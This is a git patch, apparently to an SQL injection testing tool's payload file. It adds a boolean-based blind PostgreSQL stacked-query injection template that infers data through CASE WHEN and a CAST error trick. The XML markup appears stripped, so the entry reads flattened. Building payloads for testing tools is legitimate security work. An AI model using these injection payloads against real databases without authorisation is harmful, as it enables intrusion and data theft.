From 423a34c9f3238b54e874c1e372bc8c3e7af994d1 Mon Sep 17 00:00:00 2001 From: Timo Boettcher Date: Thu, 5 Oct 2017 23:58:29 +0200 Subject: [PATCH] Add boolean-blind for postgreql in stacked-queries The patch is based on time-based blind exploitation --- xml/payloads/boolean_blind.xml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 114097cf7..4099a01f8 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -525,6 +525,27 @@ Tag: + + PostgreSQL > 8.1 stacked queries (comment) - boolean-based blind + 1 + 1 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL + +
+ PostgreSQL + > 8.1 +
+
+ Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) 1